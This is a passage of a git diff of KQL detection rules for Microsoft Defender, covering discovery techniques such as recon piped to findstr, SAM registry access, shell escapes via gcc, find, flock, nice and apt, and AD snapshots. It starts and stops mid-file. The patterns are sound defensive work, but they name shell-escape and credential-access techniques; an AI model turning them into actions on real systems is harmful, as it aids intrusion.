+++ b/KQL/rules/Discovery/recon_command_output_piped_to_findstr_exe.kql
@@ -1,11 +1,11 @@
-// Title: Recon Command Output Piped To Findstr.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2023-07-06
-// Level: medium
-// Description: Detects the execution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" for example.
-// Attackers often time use this technique to extract specific information they require in their reconnaissance phase.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1057
-
-DeviceProcessEvents
+// Title: Recon Command Output Piped To Findstr.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2023-07-06
+// Level: medium
+// Description: Detects the execution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" for example.
+// Attackers often time use this technique to extract specific information they require in their reconnaissance phase.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1057
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "ipconfig" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "net" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "netstat" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "ping" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "systeminfo" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "tasklist" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "whoami" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find")) and (not((ProcessCommandLine contains "cmd.exe /c TASKLIST /V |" and ProcessCommandLine contains "FIND /I" and ProcessCommandLine contains "\\xampp\\" and ProcessCommandLine contains "\\catalina_start.bat")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/renamed_whoami_execution.kql b/KQL/rules/Discovery/renamed_whoami_execution.kql
index d4781e91..e869e646 100644
--- a/KQL/rules/Discovery/renamed_whoami_execution.kql
+++ b/KQL/rules/Discovery/renamed_whoami_execution.kql
@@ -1,10 +1,10 @@
-// Title: Renamed Whoami Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-08-12
-// Level: critical
-// Description: Detects the execution of whoami that has been renamed to a different name to avoid detection
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1033, car.2016-03-001
-
-DeviceProcessEvents
+// Title: Renamed Whoami Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-08-12
+// Level: critical
+// Description: Detects the execution of whoami that has been renamed to a different name to avoid detection
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033, car.2016-03-001
+
+DeviceProcessEvents
 | where ProcessVersionInfoOriginalFileName =~ "whoami.exe" and (not(FolderPath endswith "\\whoami.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/sam_registry_hive_handle_request.kql b/KQL/rules/Discovery/sam_registry_hive_handle_request.kql
index 8ee8f789..42193b52 100644
--- a/KQL/rules/Discovery/sam_registry_hive_handle_request.kql
+++ b/KQL/rules/Discovery/sam_registry_hive_handle_request.kql
@@ -1,10 +1,10 @@
-// Title: SAM Registry Hive Handle Request
-// Author: Roberto Rodriguez @Cyb3rWard0g
-// Date: 2019-08-12
-// Level: high
-// Description: Detects handles requested to SAM registry hive
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1012, attack.credential-access, attack.t1552.002
-
-DeviceRegistryEvents
+// Title: SAM Registry Hive Handle Request
+// Author: Roberto Rodriguez @Cyb3rWard0g
+// Date: 2019-08-12
+// Level: high
+// Description: Detects handles requested to SAM registry hive
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1012, attack.credential-access, attack.t1552.002
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\SAM"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/security_software_discovery_linux.kql b/KQL/rules/Discovery/security_software_discovery_linux.kql
index d85befda..902ae8e1 100644
--- a/KQL/rules/Discovery/security_software_discovery_linux.kql
+++ b/KQL/rules/Discovery/security_software_discovery_linux.kql
@@ -1,12 +1,12 @@
-// Title: Security Software Discovery - Linux
-// Author: Daniil Yugoslavskiy, oscd.community
-// Date: 2020-10-19
-// Level: low
-// Description: Detects usage of system utilities (only grep and egrep for now) to discover security software discovery
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1518.001
-// False Positives:
-// - Legitimate activities
-
-DeviceProcessEvents
+// Title: Security Software Discovery - Linux
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
+// Level: low
+// Description: Detects usage of system utilities (only grep and egrep for now) to discover security software discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1518.001
+// False Positives:
+// - Legitimate activities
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "nessusd" or ProcessCommandLine contains "td-agent" or ProcessCommandLine contains "packetbeat" or ProcessCommandLine contains "filebeat" or ProcessCommandLine contains "auditbeat" or ProcessCommandLine contains "osqueryd" or ProcessCommandLine contains "cbagentd" or ProcessCommandLine contains "falcond") and (FolderPath endswith "/grep" or FolderPath endswith "/egrep")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/security_software_discovery_macos.kql b/KQL/rules/Discovery/security_software_discovery_macos.kql
index 26007344..31c19c30 100644
--- a/KQL/rules/Discovery/security_software_discovery_macos.kql
+++ b/KQL/rules/Discovery/security_software_discovery_macos.kql
@@ -1,12 +1,12 @@
-// Title: Security Software Discovery - MacOs
-// Author: Daniil Yugoslavskiy, oscd.community
-// Date: 2020-10-19
-// Level: medium
-// Description: Detects usage of system utilities (only grep for now) to discover security software discovery
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1518.001
-// False Positives:
-// - Legitimate activities
-
-DeviceProcessEvents
+// Title: Security Software Discovery - MacOs
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
+// Level: medium
+// Description: Detects usage of system utilities (only grep for now) to discover security software discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1518.001
+// False Positives:
+// - Legitimate activities
+
+DeviceProcessEvents
 | where FolderPath =~ "/usr/bin/grep" and ((ProcessCommandLine contains "nessusd" or ProcessCommandLine contains "santad" or ProcessCommandLine contains "CbDefense" or ProcessCommandLine contains "falcond" or ProcessCommandLine contains "td-agent" or ProcessCommandLine contains "packetbeat" or ProcessCommandLine contains "filebeat" or ProcessCommandLine contains "auditbeat" or ProcessCommandLine contains "osqueryd" or ProcessCommandLine contains "BlockBlock" or ProcessCommandLine contains "LuLu") or (ProcessCommandLine contains "Little" and ProcessCommandLine contains "Snitch"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/security_tools_keyword_lookup_via_findstr_exe.kql b/KQL/rules/Discovery/security_tools_keyword_lookup_via_findstr_exe.kql
index 127e33b3..260b5bc3 100644
--- a/KQL/rules/Discovery/security_tools_keyword_lookup_via_findstr_exe.kql
+++ b/KQL/rules/Discovery/security_tools_keyword_lookup_via_findstr_exe.kql
@@ -1,11 +1,11 @@
-// Title: Security Tools Keyword Lookup Via Findstr.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2023-10-20
-// Level: medium
-// Description: Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results.
-// This detection focuses on the keywords that the attacker might use as a filter.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1518.001
-
-DeviceProcessEvents
+// Title: Security Tools Keyword Lookup Via Findstr.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2023-10-20
+// Level: medium
+// Description: Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results.
+// This detection focuses on the keywords that the attacker might use as a filter.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1518.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine endswith " avira" or ProcessCommandLine endswith " avira\"" or ProcessCommandLine endswith " cb" or ProcessCommandLine endswith " cb\"" or ProcessCommandLine endswith " cylance" or ProcessCommandLine endswith " cylance\"" or ProcessCommandLine endswith " defender" or ProcessCommandLine endswith " defender\"" or ProcessCommandLine endswith " kaspersky" or ProcessCommandLine endswith " kaspersky\"" or ProcessCommandLine endswith " kes" or ProcessCommandLine endswith " kes\"" or ProcessCommandLine endswith " mc" or ProcessCommandLine endswith " mc\"" or ProcessCommandLine endswith " sec" or ProcessCommandLine endswith " sec\"" or ProcessCommandLine endswith " sentinel" or ProcessCommandLine endswith " sentinel\"" or ProcessCommandLine endswith " symantec" or ProcessCommandLine endswith " symantec\"" or ProcessCommandLine endswith " virus" or ProcessCommandLine endswith " virus\"") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/share_and_session_enumeration_using_net_exe.kql b/KQL/rules/Discovery/share_and_session_enumeration_using_net_exe.kql
index 639d1101..f7b92e5b 100644
--- a/KQL/rules/Discovery/share_and_session_enumeration_using_net_exe.kql
+++ b/KQL/rules/Discovery/share_and_session_enumeration_using_net_exe.kql
@@ -1,12 +1,12 @@
-// Title: Share And Session Enumeration Using Net.EXE
-// Author: Endgame, JHasenbusch (ported for oscd.community)
-// Date: 2018-10-30
-// Level: low
-// Description: Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1018
-// False Positives:
-// - Legitimate use of net.exe utility by legitimate user
-
-DeviceProcessEvents
+// Title: Share And Session Enumeration Using Net.EXE
+// Author: Endgame, JHasenbusch (ported for oscd.community)
+// Date: 2018-10-30
+// Level: low
+// Description: Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1018
+// False Positives:
+// - Legitimate use of net.exe utility by legitimate user
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "view" and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine contains "\\\\"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/shell_execution_gcc_linux.kql b/KQL/rules/Discovery/shell_execution_gcc_linux.kql
index e3fb57c5..0c36903b 100644
--- a/KQL/rules/Discovery/shell_execution_gcc_linux.kql
+++ b/KQL/rules/Discovery/shell_execution_gcc_linux.kql
@@ -1,10 +1,10 @@
-// Title: Shell Execution GCC - Linux
-// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
-// Date: 2024-09-02
-// Level: high
-// Description: Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1083
-
-DeviceProcessEvents
+// Title: Shell Execution GCC - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/bin/bash,-s" or ProcessCommandLine contains "/bin/dash,-s" or ProcessCommandLine contains "/bin/fish,-s" or ProcessCommandLine contains "/bin/sh,-s" or ProcessCommandLine contains "/bin/zsh,-s") and (ProcessCommandLine contains "-wrapper" and (FolderPath endswith "/c89" or FolderPath endswith "/c99" or FolderPath endswith "/gcc"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/shell_execution_via_find_linux.kql b/KQL/rules/Discovery/shell_execution_via_find_linux.kql
index c35bbc2d..97c5fc00 100644
--- a/KQL/rules/Discovery/shell_execution_via_find_linux.kql
+++ b/KQL/rules/Discovery/shell_execution_via_find_linux.kql
@@ -1,10 +1,10 @@
-// Title: Shell Execution via Find - Linux
-// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
-// Date: 2024-09-02
-// Level: high
-// Description: Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1083
-
-DeviceProcessEvents
+// Title: Shell Execution via Find - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and ((ProcessCommandLine contains " . " and ProcessCommandLine contains "-exec") and FolderPath endswith "/find")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/shell_execution_via_flock_linux.kql b/KQL/rules/Discovery/shell_execution_via_flock_linux.kql
index 67b5bef1..5673720e 100644
--- a/KQL/rules/Discovery/shell_execution_via_flock_linux.kql
+++ b/KQL/rules/Discovery/shell_execution_via_flock_linux.kql
@@ -1,10 +1,10 @@
-// Title: Shell Execution via Flock - Linux
-// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
-// Date: 2024-09-02
-// Level: high
-// Description: Detects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1083
-
-DeviceProcessEvents
+// Title: Shell Execution via Flock - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and (ProcessCommandLine contains " -u " and FolderPath endswith "/flock")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/shell_execution_via_nice_linux.kql b/KQL/rules/Discovery/shell_execution_via_nice_linux.kql
index c927de1c..eefb729d 100644
--- a/KQL/rules/Discovery/shell_execution_via_nice_linux.kql
+++ b/KQL/rules/Discovery/shell_execution_via_nice_linux.kql
@@ -1,10 +1,10 @@
-// Title: Shell Execution via Nice - Linux
-// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
-// Date: 2024-09-02
-// Level: high
-// Description: Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1083
-
-DeviceProcessEvents
+// Title: Shell Execution via Nice - Linux
+// Author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
+// Date: 2024-09-02
+// Level: high
+// Description: Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
 | where (ProcessCommandLine endswith "/bin/bash" or ProcessCommandLine endswith "/bin/dash" or ProcessCommandLine endswith "/bin/fish" or ProcessCommandLine endswith "/bin/sh" or ProcessCommandLine endswith "/bin/zsh") and FolderPath endswith "/nice"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/shell_invocation_via_apt_linux.kql b/KQL/rules/Discovery/shell_invocation_via_apt_linux.kql
index ad38aa3a..6f2fbba6 100644
--- a/KQL/rules/Discovery/shell_invocation_via_apt_linux.kql
+++ b/KQL/rules/Discovery/shell_invocation_via_apt_linux.kql
@@ -1,11 +1,11 @@
-// Title: Shell Invocation via Apt - Linux
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-12-28
-// Level: medium
-// Description: Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands.
-// Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1083
-
-DeviceProcessEvents
+// Title: Shell Invocation via Apt - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-28
+// Level: medium
+// Description: Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands.
+// Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "APT::Update::Pre-Invoke::=" and (FolderPath endswith "/apt" or FolderPath endswith "/apt-get")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/suspicious_active_directory_database_snapshot_via_adexplorer.kql b/KQL/rules/Discovery/suspicious_active_directory_database_snapshot_via_adexplorer.kql
index 9d0546ef..9b6a5b4e 100644
--- a/KQL/rules/Discovery/suspicious_active_directory_database_snapshot_via_adexplorer.kql
+++ b/KQL/rules/Discovery/suspicious_active_directory_database_snapshot_via_adexplorer.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Active Directory Database Snapshot Via ADExplorer
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-03-14
-// Level: high
-// Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database to a suspicious directory. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1087.002, attack.t1069.002, attack.t1482
-
-DeviceProcessEvents
+// Title: Suspicious Active Directory Database Snapshot Via ADExplorer
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-14
+// Level: high
+// Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database to a suspicious directory. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.002, attack.t1069.002, attack.t1482
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "snapshot" and ((FolderPath endswith "\\ADExp.exe" or FolderPath endswith "\\ADExplorer.exe" or FolderPath endswith "\\ADExplorer64.exe" or FolderPath endswith "\\ADExplorer64a.exe") or ProcessVersionInfoOriginalFileName =~ "AdExp" or ProcessVersionInfoFileDescription =~ "Active Directory Editor" or ProcessVersionInfoProductName =~ "Sysinternals ADExplorer") and (ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/suspicious_execution_of_hostname.kql b/KQL/rules/Discovery/suspicious_execution_of_hostname.kql
index 25af7557..9092079b 100644
--- a/KQL/rules/Discovery/suspicious_execution_of_hostname.kql
+++ b/KQL/rules/Discovery/suspicious_execution_of_hostname.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Execution of Hostname
-// Author: frack113
-// Date: 2022-01-01
-// Level: low
-// Description: Use of hostname to get information
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1082
-
-DeviceProcessEvents
+// Title: Suspicious Execution of Hostname
+// Author: frack113
+// Date: 2022-01-01
+// Level: low
+// Description: Use of hostname to get information
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+
+DeviceProcessEvents
 | where FolderPath endswith "\\HOSTNAME.EXE"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/suspicious_execution_of_systeminfo.kql b/KQL/rules/Discovery/suspicious_execution_of_systeminfo.kql
index d7e57ab4..4df7244e 100644
--- a/KQL/rules/Discovery/suspicious_execution_of_systeminfo.kql
+++ b/KQL/rules/Discovery/suspicious_execution_of_systeminfo.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Execution of Systeminfo
-// Author: frack113
-// Date: 2022-01-01
-// Level: low
-// Description: Detects usage of the "systeminfo" command to retrieve information
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1082
-
-DeviceProcessEvents
+// Title: Suspicious Execution of Systeminfo
+// Author: frack113
+// Date: 2022-01-01
+// Level: low
+// Description: Detects usage of the "systeminfo" command to retrieve information
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+
+DeviceProcessEvents
 | where FolderPath endswith "\\systeminfo.exe" or ProcessVersionInfoOriginalFileName =~ "sysinfo.exe"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql b/KQL/rules/Discovery/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql
index 2d60224e..b3be07ec 100644
--- a/KQL/rules/Discovery/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql
+++ b/KQL/rules/Discovery/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql
@@ -1,14 +1,14 @@
-// Title: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
-// Author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019-01-16
-// Level: medium
-// Description: Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE
-// Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1087.001, attack.t1087.002
-// False Positives:
-// - Inventory tool runs
-// - Administrative activity
-
-DeviceProcessEvents
+// Title: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
+// Author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE
+// Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.001, attack.t1087.002
+// False Positives:
+// - Inventory tool runs
+// - Administrative activity
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) and ((((ProcessCommandLine contains "domain admins" or ProcessCommandLine contains " administrator" or ProcessCommandLine contains " administrateur" or ProcessCommandLine contains "enterprise admins" or ProcessCommandLine contains "Exchange Trusted Subsystem" or ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto" or ProcessCommandLine contains " /do") and (ProcessCommandLine contains " group " or ProcessCommandLine contains " localgroup ")) and (not(ProcessCommandLine contains " /add"))) or (ProcessCommandLine contains " /do" and ProcessCommandLine contains " accounts "))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/suspicious_kernel_dump_using_dtrace.kql b/KQL/rules/Discovery/suspicious_kernel_dump_using_dtrace.kql
index 023b2ff0..d6357ace 100644
--- a/KQL/rules/Discovery/suspicious_kernel_dump_using_dtrace.kql
+++ b/KQL/rules/Discovery/suspicious_kernel_dump_using_dtrace.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Kernel Dump Using Dtrace
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-12-28
-// Level: high
-// Description: Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1082
-
-DeviceProcessEvents
+// Title: Suspicious Kernel Dump Using Dtrace
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-12-28
+// Level: high
+// Description: Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "syscall:::return" and ProcessCommandLine contains "lkd(") or (ProcessCommandLine contains "lkd(0)" and FolderPath endswith "\\dtrace.exe")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/suspicious_network_command.kql b/KQL/rules/Discovery/suspicious_network_command.kql
index 53201dc7..2b43c97d 100644
--- a/KQL/rules/Discovery/suspicious_network_command.kql
+++ b/KQL/rules/Discovery/suspicious_network_command.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Network Command
-// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
-// Date: 2021-12-07
-// Level: low
-// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1016
-// False Positives:
-// - Administrator, hotline ask to user
-
-DeviceProcessEvents
+// Title: Suspicious Network Command
+// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
+// Date: 2021-12-07
+// Level: low
+// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016
+// False Positives:
+// - Administrator, hotline ask to user
+
+DeviceProcessEvents
 | where ProcessCommandLine matches regex "ipconfig\\s+/all" or ProcessCommandLine matches regex "netsh\\s+interface show interface" or ProcessCommandLine matches regex "arp\\s+-a" or ProcessCommandLine matches regex "nbtstat\\s+-n" or ProcessCommandLine matches regex "net\\s+config" or ProcessCommandLine matches regex "route\\s+print"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/suspicious_network_connection_to_ip_lookup_service_apis.kql b/KQL/rules/Discovery/suspicious_network_connection_to_ip_lookup_service_apis.kql
index 3e583006..8af365a5 100644
--- a/KQL/rules/Discovery/suspicious_network_connection_to_ip_lookup_service_apis.kql
+++ b/KQL/rules/Discovery/suspicious_network_connection_to_ip_lookup_service_apis.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Network Connection to IP Lookup Service APIs
-// Author: Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-04-24
-// Level: medium
-// Description: Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1016
-// False Positives:
-// - Legitimate use of the external websites for troubleshooting or network monitoring
-
-DeviceNetworkEvents
+// Title: Suspicious Network Connection to IP Lookup Service APIs
+// Author: Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-24
+// Level: medium
+// Description: Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016
+// False Positives:
+// - Legitimate use of the external websites for troubleshooting or network monitoring
+
+DeviceNetworkEvents
 | where ((RemoteUrl in~ ("www.ip.cn", "l2.io")) or (RemoteUrl contains "api.2ip.ua" or RemoteUrl contains "api.bigdatacloud.net" or RemoteUrl contains "api.ipify.org" or RemoteUrl contains "bot.whatismyipaddress.com" or RemoteUrl contains "canireachthe.net" or RemoteUrl contains "checkip.amazonaws.com" or RemoteUrl contains "checkip.dyndns.org" or RemoteUrl contains "curlmyip.com" or RemoteUrl contains "db-ip.com" or RemoteUrl contains "edns.ip-api.com" or RemoteUrl contains "eth0.me" or RemoteUrl contains "freegeoip.app" or RemoteUrl contains "geoipy.com" or RemoteUrl contains "getip.pro" or RemoteUrl contains "icanhazip.com" or RemoteUrl contains "ident.me" or RemoteUrl contains "ifconfig.io" or RemoteUrl contains "ifconfig.me" or RemoteUrl contains "ip-api.com" or RemoteUrl contains "ip.360.cn" or RemoteUrl contains "ip.anysrc.net" or RemoteUrl contains "ip.taobao.com" or RemoteUrl contains "ip.tyk.nu" or RemoteUrl contains "ipaddressworld.com" or RemoteUrl contains "ipapi.co" or RemoteUrl contains "ipconfig.io" or RemoteUrl contains "ipecho.net" or RemoteUrl contains "ipinfo.io" or RemoteUrl contains "ipip.net" or RemoteUrl contains "ipof.in" or RemoteUrl contains "ipv4.icanhazip.com" or RemoteUrl contains "ipv4bot.whatismyipaddress.com" or RemoteUrl contains "ipv6-test.com" or RemoteUrl contains "ipwho.is" or RemoteUrl contains "jsonip.com" or RemoteUrl contains "myexternalip.com" or RemoteUrl contains "seeip.org" or RemoteUrl contains "wgetip.com" or RemoteUrl contains "whatismyip.akamai.com" or RemoteUrl contains "whois.pconline.com.cn" or RemoteUrl contains "wtfismyip.com")) and (not((InitiatingProcessFolderPath endswith "\\brave.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith 